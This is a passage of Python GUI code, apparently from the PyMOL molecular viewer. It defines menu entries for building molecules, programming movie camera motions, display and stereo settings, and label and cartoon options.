command = lambda s=self: s.cmd.do("_ cycle_valence"))
self.menuBar.addmenuitem('Build', 'command', 'Fill Hydrogens',
label='Fill Hydrogens on (pk1) [Ctrl-Shift-R]',
command = lambda s=self: s.cmd.do("_ h_fill"))
self.menuBar.addmenuitem('Build', 'command', 'Invert',
label='Invert (pk2)-(pk1)-(pk3) [Ctrl-Shift-E]',
command = lambda s=self: s.cmd.do("_ invert"))
self.menuBar.addmenuitem('Build', 'command', 'Form Bond',
label='Create Bond (pk1)-(pk2) [Ctrl-Shift-T]',
command = lambda s=self: s.cmd.do("_ bond"))
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addmenuitem('Build', 'command', 'Remove (pk1)',
label='Remove (pk1) [Ctrl-Shift-D]',
command = lambda s=self: s.cmd.do("_ remove pk1"))
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addmenuitem('Build', 'command', 'Make Positive',
label='Make (pk1) Positive [Ctrl-Shift-K]',
command = lambda s=self: s.cmd.do("_ alter pk1,formal_charge=1.0"))
self.menuBar.addmenuitem('Build', 'command', 'Make Negative',
label='Make (pk1) Negative [Ctrl-Shift-J]',
command = lambda s=self: s.cmd.do("_ alter pk1,formal_charge=-1.0"))
self.menuBar.addmenuitem('Build', 'command', 'Make Neutral',
label='Make (pk1) Neutral [Ctrl-Shift-U]',
                                 command = lambda s=self: s.cmd.do("_ alter pk1,formal_charge=0.0"))
self.menuBar.addmenu('Movie', 'Movie Control',tearoff=TRUE)
self.menuBar.addcascademenu('Movie', 'Append', 'Append',
label='Append')
self.menuBar.addmenuitem('Append', 'command', '0.25 second',label='0.25 second',
command = lambda s=self: s.cmd.do("_ movie.add_blank(0.25)"))
self.menuBar.addmenuitem('Append', 'command', '0.5 second',label='0.5 second',
command = lambda s=self: s.cmd.do("_ movie.add_blank(0.5)"))
self.menuBar.addmenuitem('Append', 'command', '1 second',label='1 second',
command = lambda s=self: s.cmd.do("_ movie.add_blank(1.0)"))
self.menuBar.addmenuitem('Append', 'command', '2 seconds',label='2 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(2.0)"))
self.menuBar.addmenuitem('Append', 'command', '3 seconds',label='3 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(3.0)"))
self.menuBar.addmenuitem('Append', 'command', '4 seconds',label='4 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(4.0)"))
self.menuBar.addmenuitem('Append', 'command', '6 seconds',label='6 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(6.0)"))
self.menuBar.addmenuitem('Append', 'command', '8 seconds',label='8 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(8.0)"))
self.menuBar.addmenuitem('Append', 'command', '12 seconds',label='12 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(12.0)"))
self.menuBar.addmenuitem('Append', 'command', '18 seconds',label='18 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(18.0)"))
self.menuBar.addmenuitem('Append', 'command', '24 seconds',label='24 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(24.0)"))
self.menuBar.addmenuitem('Append', 'command', '30 seconds',label='30 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(30.0)"))
self.menuBar.addmenuitem('Append', 'command', '48 seconds',label='48 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(48.0)"))
self.menuBar.addmenuitem('Append', 'command', '60 seconds',label='60 seconds',
command = lambda s=self: s.cmd.do("_ movie.add_blank(60.0)"))
self.menuBar.addcascademenu('Movie', 'Program', 'Program',
label='Program')
self.menuBar.addmenuitem('Movie', 'command', 'Update Last Program',label='Update Last Program',
command = lambda s=self: s.mvprg())
self.menuBar.addmenuitem('Movie', 'command', 'Remove Last Program',label='Remove Last Program',
command = lambda s=self: s.mvprg(-1))
self.menuBar.addcascademenu('Program', 'Camera', 'Camera Loop',
label='Camera Loop')
self.menuBar.addcascademenu('Camera', 'Nutate', 'Nutate',
label='Nutate')
self.menuBar.addmenuitem('Camera', 'separator', '')
self.menuBar.addmenuitem('Nutate', 'command', '15 deg. over 4 sec.',label='15 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(4,15,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '15 deg. over 8 sec.',label='15 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(8,15,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '15 deg. over 12 sec.',label='15 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(12,15,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'separator', '')
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 4 sec.',label='30 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(4,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 8 sec.',label='30 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(8,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 12 sec.',label='30 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(12,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '30 deg. over 16 sec.',label='30 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(16,30,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'separator', '')
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 8 sec.',label='60 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(8,60,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 16 sec.',label='60 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(16,60,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 24 sec.',label='60 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(24,60,start=%d)"))
self.menuBar.addmenuitem('Nutate', 'command', '60 deg. over 32 sec.',label='60 deg. over 32 sec.',
command = lambda s=self: s.mvprg("_ movie.add_nutate(32,60,start=%d)"))
self.menuBar.addcascademenu('Camera', 'X-Rock', 'X-Rock',
label='X-Rock')
self.menuBar.addmenuitem('X-Rock', 'command', '30 deg. over 2 sec.',label='30 deg. over 2 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(2,30,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '30 deg. over 4 sec.',label='30 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,30,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '30 deg. over 8 sec.',label='30 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,30,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '60 deg. over 4 sec.',label='60 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,60,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '60 deg. over 8 sec.',label='60 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,60,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '60 deg. over 16 sec.',label='60 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,60,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '90 deg. over 6 sec.',label='90 deg. over 6 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(6,90,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '90 deg. over 12 sec.',label='90 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,90,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '90 deg. over 24 sec.',label='90 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,90,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '120 deg. over 8 sec.',label='120 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,120,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '120 deg. over 16 sec.',label='120 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,120,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '120 deg. over 32 sec.',label='120 deg. over 32 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(32,120,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'separator', '')
self.menuBar.addmenuitem('X-Rock', 'command', '180 deg. over 12 sec.',label='180 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,179.99,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '180 deg. over 24 sec.',label='180 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,179.99,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Rock', 'command', '180 deg. over 48 sec.',label='180 deg. over 48 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(48,179.99,axis='x',start=%d)"))
self.menuBar.addcascademenu('Camera', 'X-Roll', 'X-Roll',
label='X-Roll')
self.menuBar.addmenuitem('X-Roll', 'command', '4 seconds',label='4 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(4.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Roll', 'command', '8 seconds',label='8 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(8.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Roll', 'command', '16 seconds',label='16 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(16.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('X-Roll', 'command', '32 seconds',label='32 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(32.0,axis='x',start=%d)"))
self.menuBar.addmenuitem('Camera', 'separator', '')
self.menuBar.addcascademenu('Camera', 'Y-Rock', 'Y-Rock',
label='Y-Rock')
self.menuBar.addmenuitem('Y-Rock', 'command', '30 deg. over 2 sec.',label='30 deg. over 2 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(2,30,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '30 deg. over 4 sec.',label='30 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,30,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '30 deg. over 8 sec.',label='30 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,30,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '60 deg. over 4 sec.',label='60 deg. over 4 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(4,60,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '60 deg. over 8 sec.',label='60 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,60,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '60 deg. over 16 sec.',label='60 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,60,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '90 deg. over 6 sec.',label='90 deg. over 6 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(6,90,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '90 deg. over 12 sec.',label='90 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,90,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '90 deg. over 24 sec.',label='90 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,90,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '120 deg. over 8 sec.',label='120 deg. over 8 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(8,120,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '120 deg. over 16 sec.',label='120 deg. over 16 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(16,120,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '120 deg. over 32 sec.',label='120 deg. over 32 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(32,120,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'separator', '')
self.menuBar.addmenuitem('Y-Rock', 'command', '180 deg. over 12 sec.',label='180 deg. over 12 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(12,179.99,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '180 deg. over 24 sec.',label='180 deg. over 24 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(24,179.99,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Rock', 'command', '180 deg. over 48 sec.',label='180 deg. over 48 sec.',
command = lambda s=self: s.mvprg("_ movie.add_rock(48,179.99,axis='y',start=%d)"))
self.menuBar.addcascademenu('Camera', 'Y-Roll', 'Y-Roll',
label='Y-Roll')
self.menuBar.addmenuitem('Y-Roll', 'command', '4 seconds',label='4 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(4.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Roll', 'command', '8 seconds',label='8 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(8.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Roll', 'command', '16 seconds',label='16 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(16.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Y-Roll', 'command', '32 seconds',label='32 seconds',
command = lambda s=self: s.mvprg("_ movie.add_roll(32.0,axis='y',start=%d)"))
self.menuBar.addmenuitem('Program', 'separator', '')
self.menuBar.addcascademenu('Program', 'Scene Loop', 'Scene Loop',
label='Scene Loop')
for label, rock in [('Nutate', 4), ('X-Rock', 2), ('Y-Rock', 1)]:
mlabel = 'SL-' + label
self.menuBar.addcascademenu('Scene Loop', mlabel, label, label=label)
for angle, seconds in ((30, (2,4,8)), (60, (4,8,16)), (90, (6,12,24)), (120, (8,16,32))):
if angle != 30:
self.menuBar.addmenuitem(mlabel, 'separator', '')
for sec in seconds:
label = '%d deg. over %d sec.' % (angle, sec)
self.menuBar.addmenuitem(mlabel, 'command', label, label=label,
command=self.mvprg_scene_loop(sec, rock, angle))
self.menuBar.addcascademenu('Scene Loop', 'No-Motion', 'Steady',
label='Steady')
self.menuBar.addmenuitem('No-Motion', 'command', '1 second each',label='1 second each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,1.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '2 seconds each',label='2 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,2.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '4 seconds each',label='4 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,4.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '8 seconds each',label='8 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,8.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '12 seconds each',label='12 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,12.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '16 seconds each',label='16 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,16.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('No-Motion', 'command', '24 seconds each',label='24 seconds each',
command = lambda s=self: s.mvprg("_ movie.add_scenes(None,24.0,rock=0,start=%d)"))
self.menuBar.addmenuitem('Program', 'separator', '')
self.menuBar.addcascademenu('Program', 'StateLoop', 'State Loop',
label='State Loop')
self.menuBar.addcascademenu('Program', 'StateSweep', 'State Sweep',
label='State Sweep')
speed_list = [ 1, 2, 3, 4, 8, 16 ]
pause_list = [ 0, 1, 2, 4 ]
for speed in speed_list:
submenu1_id = 'StateLoop' + '%d'%speed
submenu2_id = 'StateSweep' + '%d'%speed
if speed==1:
submenu_title = "Full Speed"
else:
submenu_title = "1/%d Speed"%speed
self.menuBar.addcascademenu('StateLoop', submenu1_id, label=submenu_title)
self.menuBar.addcascademenu('StateSweep', submenu2_id, label=submenu_title)
for pause in pause_list:
if not pause:
item_name = "no pause"
else:
item_name = "%d second pause"%pause
self.menuBar.addmenuitem(submenu1_id, 'command', item_name,
label=item_name,
command = lambda
s=self, st="_ movie.%s(%d,%d"%
("add_state_loop", speed, pause):
s.mvprg(st+",start=%d)"))
self.menuBar.addmenuitem(submenu2_id, 'command', item_name,
label=item_name,
command = lambda
s=self, st="_ movie.%s(%d,%d"%
("add_state_sweep", speed, pause):
s.mvprg(st+",start=%d)"))
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addmenuitem('Movie', 'command', 'Reset',label='Reset',
command = lambda s=self: s.cmd.do("_ mset;rewind;"))
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addcascademenu('Movie', 'Frame Rate', 'Playback Frame Rate',
label='Frame Rate')
for val in [30, 15, 5, 1, 0.3]:
addmenuitem('Frame Rate', 'radiobutton', label=str(val) + ' FPS',
value=val, variable=self.setting.movie_fps)
self.menuBar.addmenuitem('Frame Rate', 'separator', '')
self.menuBar.addmenuitem('Frame Rate', 'checkbutton',
                         'Show Frame Rate.',
label='Show Frame Rate',
variable = self.setting.show_frame_rate,
)
self.menuBar.addmenuitem('Frame Rate', 'command', 'Reset Meter',
label='Reset Meter',
command = lambda s=self: s.cmd.do("_ meter_reset"))
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Auto Interpolate',
label='Auto Interpolate',
variable = self.setting.movie_auto_interpolate,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Show Panel',
label='Show Panel',
variable = self.setting.movie_panel,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Loop Frames',
label='Loop Frames',
variable = self.setting.movie_loop,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
                         'OpenGL-rendered images.',
label='Draw Frames',
variable = self.setting.draw_frames,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Photorealistic images.',
label='Ray Trace Frames',
variable = self.setting.ray_trace_frames,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Save images in memory.',
label='Cache Frame Images',
variable = self.setting.cache_frames,
)
self.menuBar.addmenuitem('Movie', 'command', 'Clear Image Cache',
label='Clear Image Cache',
command = lambda s=self: s.cmd.mclear())
self.menuBar.addmenuitem('Movie', 'separator', '')
self.menuBar.addmenuitem('Movie', 'checkbutton',
                         'Static Singleton Objects',
label='Static Singletons',
variable = self.setting.static_singletons,
)
self.menuBar.addmenuitem('Movie', 'checkbutton',
'Superimpose all molecular states.',
label='Show All States',
variable = self.setting.all_states,
)
self.menuBar.addmenu('Display', 'Display Control',tearoff=TRUE)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Sequence',
label='Sequence',
variable = self.setting.seq_view,
)
self.menuBar.addcascademenu('Display', 'Sequence', 'Sequence Mode',
label='Sequence Mode')
var = self.setting.seq_view_format
for lab, val in [
('Residue Codes', 0),
('Residue Names', 1),
('Chain Identifiers', 3),
('Atom Names', 2),
('States', 4),
]:
addmenuitem('Sequence', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Sequence', 'separator', '')
var = self.setting.seq_view_label_mode
for lab, val in [
('All Residue Numbers', 2),
('Top Sequence Only', 1),
('Object Names Only', 0),
('No Labels', 3),
]:
addmenuitem('Sequence', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Stereo',
label='Stereo',
variable = self.setting.stereo,
)
# self.menuBar.addmenuitem('Display', 'command', 'Stereo On',
# label='Stereo On',
# command = lambda s=self: s.cmd.do("_ stereo on"))
# self.menuBar.addmenuitem('Display', 'command', 'Stereo Off',
# label='Stereo Off',
# command = lambda s=self: s.cmd.do("_ stereo off"))
self.menuBar.addcascademenu('Display', 'Stereo', 'Stereo Mode',
label='Stereo Mode')
self.menuBar.addmenuitem('Stereo', 'command', 'Anaglyph Stereo',
label='Anaglyph Stereo',
command = lambda s=self: s.cmd.do("_ stereo anaglyph"))
self.menuBar.addmenuitem('Stereo', 'command', 'Cross-Eye Stereo',
label='Cross-Eye Stereo',
command = lambda s=self: s.cmd.do("_ stereo crosseye"))
self.menuBar.addmenuitem('Stereo', 'command', 'Wall-Eye Stereo',
label='Wall-Eye Stereo',
command = lambda s=self: s.cmd.do("_ stereo walleye"))
self.menuBar.addmenuitem('Stereo', 'command', 'Quad-Buffered Stereo',
label='Quad-Buffered Stereo',
command = lambda s=self: s.cmd.do("_ stereo quadbuffer"))
self.menuBar.addmenuitem('Stereo', 'command', 'Zalman Stereo',
label='Zalman Stereo',
command = lambda s=self: s.cmd.do("_ stereo byrow"))
self.menuBar.addmenuitem('Stereo', 'separator', '')
self.menuBar.addmenuitem('Stereo', 'command', 'Swap Sides',
label='Swap Sides',
command = lambda s=self: s.cmd.do("_ stereo swap"))
self.menuBar.addmenuitem('Display', 'separator', '')
self.menuBar.addcascademenu('Display', 'Zoom', 'Zoom',
label='Zoom')
self.menuBar.addmenuitem('Zoom', 'command', '4 Angstrom Sphere',
label='4 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,4,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '6 Angstrom Sphere',
label='6 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,6,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '8 Angstrom Sphere',
label='8 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,8,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '12 Angstrom Sphere',
label='12 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,12,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', '20 Angstrom Sphere',
label='20 Angstrom Sphere',
command = lambda s=self: s.cmd.do("_ zoom center,20,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', 'All',
label='All',
command = lambda s=self: s.cmd.do("_ zoom all,animate=-1"))
self.menuBar.addmenuitem('Zoom', 'command', 'Complete',
label='Complete',
command = lambda s=self: s.cmd.do("_ zoom all,complete=1,animate=-1"))
self.menuBar.addcascademenu('Display', 'Clip', 'Clip',
label='Clip')
self.menuBar.addmenuitem('Clip', 'command', 'Nothing',
label='Nothing',
command = lambda s=self: s.cmd.do("_ clip atoms,5,all"))
self.menuBar.addmenuitem('Clip', 'command', '8 Angstrom Slab',
label='8 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,8"))
self.menuBar.addmenuitem('Clip', 'command', '12 Angstrom Slab',
label='12 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,10"))
self.menuBar.addmenuitem('Clip', 'command', '16 Angstrom Slab',
label='16 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,15"))
self.menuBar.addmenuitem('Clip', 'command', '20 Angstrom Slab',
label='20 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,20"))
self.menuBar.addmenuitem('Clip', 'command', '30 Angstrom Slab',
label='30 Angstrom Slab',
command = lambda s=self: s.cmd.do("_ clip slab,30"))
self.menuBar.addmenuitem('Display', 'separator', '')
self.menuBar.addcascademenu('Display', 'Background', 'Background',
label='Background')
self.menuBar.addmenuitem('Background', 'checkbutton',
'Opaque Background Color',
label='Opaque',
variable = self.setting.opaque_background,
)
self.menuBar.addmenuitem('Background', 'checkbutton',
'Show Alpha Checker',
label='Show Alpha Checker',
variable = self.setting.show_alpha_checker,
)
self.menuBar.addmenuitem('Background', 'separator', '')
var = self.setting.bg_rgb
for lab, val in [
('White', 0), # white
('Light Grey', 134), # grey80
('Grey', 104), # grey50
('Black', 1), # black
]:
addmenuitem('Background', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addcascademenu('Display', 'Color Space', 'Color Space',
label='Color Space')
self.menuBar.addmenuitem('Color Space', 'command', 'CMYK (for publications)',
label='CMYK (for publications)',
command = lambda s=self: s.cmd.do("_ cmd.space('cmyk')"))
self.menuBar.addmenuitem('Color Space', 'command', 'PyMOL (for video & web)',
label='PyMOL (for video & web)',
command = lambda s=self: s.cmd.do("_ cmd.space('pymol')"))
self.menuBar.addmenuitem('Color Space', 'command', 'RGB (default)',
label='RGB (default)',
command = lambda s=self: s.cmd.do("_ cmd.space('rgb')"))
self.menuBar.addcascademenu('Display', 'Performance', 'Quality',
label='Quality')
self.menuBar.addmenuitem('Performance', 'command', 'Maximum Performance',
label='Maximum Performance',
command = lambda s=self: s.cmd.do("_ util.performance(100)"))
self.menuBar.addmenuitem('Performance', 'command', 'Reasonable Performance',
label='Reasonable Performance',
command = lambda s=self: s.cmd.do("_ util.performance(66)"))
self.menuBar.addmenuitem('Performance', 'command', 'Reasonable Quality',
label='Reasonable Quality',
command = lambda s=self: s.cmd.do("_ util.performance(33)"))
self.menuBar.addmenuitem('Performance', 'command', 'Maximum Quality',
label='Maximum Quality',
command = lambda s=self: s.cmd.do("_ util.performance(0)"))
self.menuBar.addcascademenu('Display', 'Grid', 'Grid',
label='Grid')
var = self.setting.grid_mode
for lab, val in [
('By Object', 1),
('By State', 2),
('By Object-State', 3),
('Disable', 0),
]:
addmenuitem('Grid', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Display', 'separator', '')
self.menuBar.addmenuitem('Display', 'checkbutton',
'Disable perspective.',
label='Orthoscopic View',
variable = self.setting.orthoscopic)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Show Valences.',
label='Show Valences',
variable = self.setting.valence,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Smooth Lines.',
label='Smooth Lines',
variable = self.setting.line_smooth,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Depth Cue (Fogging).',
label='Depth Cue',
variable = self.setting.depth_cue,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Two Sided Lighting.',
label='Two Sided Lighting',
variable = self.setting.two_sided_lighting,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Specular Reflections.',
label='Specular Reflections',
variable = self.setting.specular,
onvalue=1.0, offvalue=0.0,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Animation',
label='Animation',
variable = self.setting.animation,
)
self.menuBar.addmenuitem('Display', 'checkbutton',
'Roving Detail',
label='Roving Detail',
variable = self.setting.roving_detail,
)
self.menuBar.addmenu('Setting', 'Settings and Configuration',tearoff=TRUE)
self.menuBar.addmenuitem('Setting', 'command',
'Edit PyMOL Settings',
label='Edit All...',
command = lambda s=self: SetEditor(s))
self.menuBar.addmenuitem('Setting', 'command',
'Edit PyMOL Colors',
label='Colors...',
command = lambda s=self: ColorEditor(s))
addmenuitem('Setting', 'separator', '')
self.menuBar.addcascademenu('Setting', 'Label', 'Label',
label='Label')
self.menuBar.addcascademenu('Label', 'LabelSize', 'Size',
label='Size',tearoff=TRUE)
for i in [10., 14., 18., 24., 36., 48., 72.]:
addmenuitem('LabelSize', 'radiobutton', label='%.0f Point' % i,
value=i, variable=self.setting.label_size)
self.menuBar.addmenuitem('LabelSize', 'separator', '')
for i in [-.3, -.5, -1., -2., -4.]:
addmenuitem('LabelSize', 'radiobutton', label='%.1f Angstrom' % (-i),
value=i, variable=self.setting.label_size)
self.menuBar.addcascademenu('Label', 'LabelFont', 'Font',
label='Font', tearoff=TRUE)
for label, val in [
('Sans', 5),
('Sans Oblique', 6),
('Sans Bold', 7),
('Sans Bold Oblique', 8),
('Serif', 9),
('Serif Oblique',17),
('Serif Bold', 10),
('Serif Bold Oblique', 18),
('Mono', 11),
('Mono Oblique', 12),
('Mono Bold', 13),
('Mono Bold Oblique', 14),
('Gentium Roman', 15),
('Gentium Italic', 16),
]:
addmenuitem('LabelFont', 'radiobutton', label=label, value=val,
variable=self.setting.label_font_id)
self.menuBar.addcascademenu('Setting', 'Cartoon', 'Cartoon',
tearoff=TRUE,
label='Cartoon')
self.menuBar.addcascademenu('Cartoon', 'Rings', 'Rings & Bases',
label='Rings & Bases')
for label, val in [
('Filled Rings (Round Edges)', 1),
('Filled Rings (Flat Edges)', 2),
('Filled Rings (with Border)', 3),
('Spheres', 4),
('Base Ladders', 0),
]:
addmenuitem('Rings', 'radiobutton', label=label, value=val,
variable=self.setting.cartoon_ring_mode)
self.menuBar.addmenuitem('Rings', 'separator', '')
for label, val in [
('Bases & Sugars', 1),
('Bases Only', 2),
('Non-protein Rings', 3),
('All Rings', 4),
]:
addmenuitem('Rings', 'radiobutton', label=label, value=val,
variable=self.setting.cartoon_ring_finder)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Side Chain Helper',
label='Side Chain Helper',
variable = self.setting.cartoon_side_chain_helper,
)
self.menuBar.addmenuitem('Rings', 'separator', '')
for label, val in [
('Transparent Rings', .5),
('Default', -1.),
]:
addmenuitem('Rings', 'radiobutton', label=label, value=val,
variable=self.setting.cartoon_ring_transparency)
self.menuBar.addmenuitem('Cartoon', 'checkbutton',
'Round Helices',
label='Round Helices',
